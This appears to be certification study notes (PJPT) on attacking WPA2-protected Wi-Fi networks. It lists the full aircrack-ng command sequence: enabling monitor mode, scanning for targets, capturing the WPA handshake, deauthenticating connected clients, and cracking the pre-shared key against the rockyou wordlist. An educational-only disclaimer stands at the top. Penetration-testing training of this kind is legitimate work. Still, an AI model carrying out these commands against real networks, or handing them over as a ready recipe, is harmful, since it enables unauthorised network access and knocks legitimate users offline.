PJPT – Wifi Attacks

Disclaimer: The following instructions are only considered for educational purpose only and should not be used to attack real targets!

Attacking WPA2-protected Wifi networks

1. Connect the physical wifi antenna to your Kali machine. If wlan0 does not show up under “iwconfig”, then try the following solution: https://os73.com/en/how-to-install-alfa-awus036acs-driver-in-kali-linux/

2. Kill existing sessions:

sudo airmon-ng check kill

3. Start interface wlan0 in monitor mode:

sudo airmon-ng start wlan0

4. Look for available wifi networks and note the channel id and the MAC address of the target access point / wifi network:

sudo airodump-ng wlan0mon

5. Capture handshake during scanning the target wifi network:

sudo airodump-ng -c <channel-id> --bssid <mac-access-point> -w capture wlan0

6. Deauthenticate clients on the target wifi network to increase the attack performance. Alternatively you can wait until a wifi client reconnects to the wifi network:

sudo aireplay-ng -0 1 -a <mac-ap> -c <mac-station> wlan0

7. If the handshake is found (message is showing up in the console), look for “capture.cap” file:

8. Try to crack the wifi pre-shared-key / password with aircrack-ng:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <mac-access-point> capture.cap